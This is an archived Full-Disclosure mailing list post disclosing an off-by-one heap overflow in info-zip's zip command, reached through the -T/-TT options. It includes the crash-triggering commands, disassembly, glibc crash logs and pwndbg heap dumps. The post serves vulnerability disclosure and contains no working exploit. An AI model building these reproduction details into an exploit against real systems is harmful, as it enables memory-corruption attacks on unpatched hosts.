lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Thu, 5 Jul 2018 23:23:57 +0900
From: 오세훈 <sehun.oh@...erone.kr>
To: fulldisclosure@...lists.org
Subject: [FD] info-zip, zip command crash.

Hello,

I found info-zip's zip command's crash.
This vulnerability is occured by off by one.
I don't use the malformed file for crash. just command.

And if 'zip' binary is added to function, it can be exploitable vulnerability I think.

[ Environment ]

OS : Ubuntu 16.04.3 LTS
Kernel : Linux ubuntu 4.4.0-127-generic #153-Ubuntu SMP Sat May 19 10:58:46 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
info-zip zip : 3.0-11

[ Condition ]

* using option -T, -TT
* Vulnerability is occured by off by one.
: linux command execution using option -T, -TT
: To execute the command used in the -T and -TT options, it is stored in the heap before the system, and the data to be stored is parsed as follows.
: 0x18 => zip flagT.zip -T -TT 'AAAAAAAAAAAA' => AAAAAAAAAAAA 'flagT.zip'
: 0x38 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' => AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: 0x58 => zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' : AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 'flagT.zip'
: When an instruction is stored in the heap, it is occured by off by one.
: It happens in the code below.
	Disassembly -
		.text:000000000040A052                 mov     rax, [rsp+48h+var_40]
		.text:000000000040A057                 mov     word ptr [r15+rax+2], 27h
	Hexray -
		*(_WORD *)&v7[v16 + 2] = 0x27;


[ Error Msg ]

CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAA'	<- die process
sh: 1: AAAAAAAAAAAA: not found
*** Error in `zip': free(): invalid next size (fast): 0x00000000009ef350 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966                            /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966                            /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966                            /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
009ee000-00a0f000 rw-p 00000000 00:00 0                                  [heap]
7f4728000000-7f4728021000 rw-p 00000000 00:00 0
7f4728021000-7f472c000000 ---p 00000000 00:00 0
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713                    /usr/lib/locale/locale-archive
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f4730372000-7f4730376000 rw-p 00000000 00:00 0
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f4730786000-7f473078a000 rw-p 00000000 00:00 0
7f47307aa000-7f47307ab000 rw-p 00000000 00:00 0
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0                          [stack]
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0                          [vvar]
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]


zip error: Interrupted (aborting)
*** Error in `zip': free(): invalid pointer: 0x00000000009ef370 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7f47300237e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x40873e]
zip[0x4090cb]
zip[0x409279]
/lib/x86_64-linux-gnu/libc.so.6(+0x354b0)[0x7f472ffe14b0]
/lib/x86_64-linux-gnu/libc.so.6(gsignal+0x38)[0x7f472ffe1428]
/lib/x86_64-linux-gnu/libc.so.6(abort+0x16a)[0x7f472ffe302a]
/lib/x86_64-linux-gnu/libc.so.6(+0x777ea)[0x7f47300237ea]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7f473002c37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7f473003053c]
zip[0x409f25]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7f472ffcc830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966                            /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966                            /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966                            /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
009ee000-00a0f000 rw-p 00000000 00:00 0                                  [heap]
7f4728000000-7f4728021000 rw-p 00000000 00:00 0
7f4728021000-7f472c000000 ---p 00000000 00:00 0
7f472fabe000-7f472fad4000 r-xp 00000000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fad4000-7f472fcd3000 ---p 00016000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd3000-7f472fcd4000 rw-p 00015000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7f472fcd4000-7f472ffac000 r--p 00000000 08:01 2229713                    /usr/lib/locale/locale-archive
7f472ffac000-7f473016c000 r-xp 00000000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f473016c000-7f473036c000 ---p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f473036c000-7f4730370000 r--p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f4730370000-7f4730372000 rw-p 001c4000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7f4730372000-7f4730376000 rw-p 00000000 00:00 0
7f4730376000-7f4730385000 r-xp 00000000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730385000-7f4730584000 ---p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730584000-7f4730585000 r--p 0000e000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730585000-7f4730586000 rw-p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7f4730586000-7f47305ac000 r-xp 00000000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f4730786000-7f473078a000 rw-p 00000000 00:00 0
7f47307a9000-7f47307aa000 rw-p 00000000 00:00 0
7f47307ab000-7f47307ac000 r--p 00025000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ac000-7f47307ad000 rw-p 00026000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7f47307ad000-7f47307ae000 rw-p 00000000 00:00 0
7ffc94323000-7ffc94344000 rw-p 00000000 00:00 0                          [stack]
7ffc9439b000-7ffc9439e000 r--p 00000000 00:00 0                          [vvar]
7ffc9439e000-7ffc943a0000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]


CMD : zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'  <- not die process

sh: 1: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAAAAAAAAAA: not found
*** Error in `zip': corrupted size vs. prev_size: 0x0000000001702190 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fa2c7f497e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x7e913)[0x7fa2c7f50913]
/lib/x86_64-linux-gnu/libc.so.6(+0x81cde)[0x7fa2c7f53cde]
/lib/x86_64-linux-gnu/libc.so.6(__libc_malloc+0x54)[0x7fa2c7f56184]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_doallocate+0x55)[0x7fa2c7f3f1d5]
/lib/x86_64-linux-gnu/libc.so.6(_IO_doallocbuf+0x34)[0x7fa2c7f4d594]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_overflow+0x1c8)[0x7fa2c7f4c8f8]
/lib/x86_64-linux-gnu/libc.so.6(_IO_file_xsputn+0xad)[0x7fa2c7f4b28d]
/lib/x86_64-linux-gnu/libc.so.6(_IO_vfprintf+0xd1)[0x7fa2c7f1f241]
/lib/x86_64-linux-gnu/libc.so.6(__fprintf_chk+0xf9)[0x7fa2c7fe8bc9]
zip[0x40a0a4]
zip[0x4079ef]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fa2c7ef2830]
zip[0x408529]
======= Memory map: ========
00400000-0042c000 r-xp 00000000 08:01 2229966                            /usr/bin/zip
0062c000-0062d000 r--p 0002c000 08:01 2229966                            /usr/bin/zip
0062d000-0062f000 rw-p 0002d000 08:01 2229966                            /usr/bin/zip
0062f000-0067e000 rw-p 00000000 00:00 0
01701000-01722000 rw-p 00000000 00:00 0                                  [heap]
7fa2c0000000-7fa2c0021000 rw-p 00000000 00:00 0
7fa2c0021000-7fa2c4000000 ---p 00000000 00:00 0
7fa2c79e4000-7fa2c79fa000 r-xp 00000000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c79fa000-7fa2c7bf9000 ---p 00016000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c7bf9000-7fa2c7bfa000 rw-p 00015000 08:01 3937284                    /lib/x86_64-linux-gnu/libgcc_s.so.1
7fa2c7bfa000-7fa2c7ed2000 r--p 00000000 08:01 2229713                    /usr/lib/locale/locale-archive
7fa2c7ed2000-7fa2c8092000 r-xp 00000000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8092000-7fa2c8292000 ---p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8292000-7fa2c8296000 r--p 001c0000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8296000-7fa2c8298000 rw-p 001c4000 08:01 3952945                    /lib/x86_64-linux-gnu/libc-2.23.so
7fa2c8298000-7fa2c829c000 rw-p 00000000 00:00 0
7fa2c829c000-7fa2c82ab000 r-xp 00000000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c82ab000-7fa2c84aa000 ---p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84aa000-7fa2c84ab000 r--p 0000e000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84ab000-7fa2c84ac000 rw-p 0000f000 08:01 3937245                    /lib/x86_64-linux-gnu/libbz2.so.1.0.4
7fa2c84ac000-7fa2c84d2000 r-xp 00000000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86ac000-7fa2c86b0000 rw-p 00000000 00:00 0
7fa2c86d0000-7fa2c86d1000 rw-p 00000000 00:00 0
7fa2c86d1000-7fa2c86d2000 r--p 00025000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86d2000-7fa2c86d3000 rw-p 00026000 08:01 3952943                    /lib/x86_64-linux-gnu/ld-2.23.so
7fa2c86d3000-7fa2c86d4000 rw-p 00000000 00:00 0
7ffc0dc06000-7ffc0dc27000 rw-p 00000000 00:00 0                          [stack]
7ffc0dd37000-7ffc0dd3a000 r-np 00000000 00:00 0                          [vvar]
7ffc0dd3a000-7ffc0dd3c000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]


zip error: Interrupted (aborting)


[ Debugging ]
set follow-fork-mode parent
b*0x0000000000409F13
b*0x0000000000409E11
r flagT.zip -T -TT 'AAAAAAAAAAAA'

* Case 1 : zip flagT.zip -T -TT 'AAAAAAAAAAAA'
: this case malloc 0x18 size.
: so, overwrite next chunk size to null. (off by one)
# Not Crash
pwndbg> x/32gx 0x67f340
0x67f340:	0x0000000000000230	0x0000000000000020
0x67f350:	0x4141414141414141	0x616c662720414141
0x67f360:	0x002770697a2e5467	0x00000000000000c1 <- off by one
0x67f370:	0x00000000000a031e	0x000000004ce40567
0x67f380:	0x0000000040a61838	0x0000000000000003
0x67f390:	0x0000000000000003	0x0000001800000004
0x67f3a0:	0x0000000000000000	0x0000000000000001
0x67f3b0:	0x0000000000000000	0x0000000081b40000
0x67f3c0:	0x000000000067f490	0x0000000000000000
0x67f3d0:	0x000000000067f450	0x0000000000000000
0x67f3e0:	0x000000000067f430	0x000000000067f470
0x67f3f0:	0x000000000067f4d0	0x0000000000000000
0x67f400:	0x0000000000000000	0x0000000000000000
0x67f410:	0x0000000000000000	0x0000000000000000
0x67f420:	0x0000000000000000	0x0000000000000021
0x67f430:	0x00007f0067616c66	0x00007ffff7bc1b78

# Crash
0x67f340:	0x0000000000000230	0x0000000000000020
0x67f350:	0x4141414141414141	0x6c66272041414141
0x67f360:	0x2770697a2e546761	0x0000000000000000 <- off by one
0x67f370:	0x00000000000a031e	0x000000004ce40567
0x67f380:	0x0000000040a61838	0x0000000000000003
0x67f390:	0x0000000000000003	0x0000001800000004
0x67f3a0:	0x0000000000000000	0x0000000000000001
0x67f3b0:	0x0000000000000000	0x0000000081b40000
0x67f3c0:	0x000000000067f490	0x0000000000000000
0x67f3d0:	0x000000000067f450	0x0000000000000000
0x67f3e0:	0x000000000067f430	0x000000000067f470
0x67f3f0:	0x000000000067f4d0	0x0000000000000000
0x67f400:	0x0000000000000000	0x0000000000000000
0x67f410:	0x0000000000000000	0x0000000000000000
0x67f420:	0x0000000000000000	0x0000000000000021
0x67f430:	0x00007f0067616c66	0x00007ffff7bc1b78

* Case 2 :  zip flagT.zip -T -TT 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
# crash
 : before __fprintf_chk@plt <0x402330>
0x67f150:	0x0000000000000000	0x0000000000000041
0x67f160:	0x000000000067f0b0	0x4141414141414141
0x67f170:	0x4141414141414141	0x4141414141414141
0x67f180:	0x4141414141414141	0x6c66272041414141
0x67f190:	0x2770697a2e546761 	0x0000000000000100 <- off by one
					        ^
				       prev_size

# not crash
: before __fprintf_chk@plt <0x402330>
0x67f150:	0x0000000000000000	0x0000000000000041
0x67f160:	0x000000000067f0b0	0x4141414141414141
0x67f170:	0x4141414141414141	0x4141414141414141
0x67f180:	0x4141414141414141	0x616c662720414141
0x67f190:	0x002770697a2e5467	0x00000000000001f1

: after __fprintf_chk@plt <0x402330>
0x67f150:	0x0000000000000000	0x0000000000000251
0x67f160:	0x00007ffff7bc1db8	0x00007ffff7bc1db8
0x67f170:	0x4141414141414141	0x4141414141414141
0x67f180:	0x4141414141414141	0x616c662720414141
0x67f190:	0x002770697a2e5467	0x0000000000000211

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists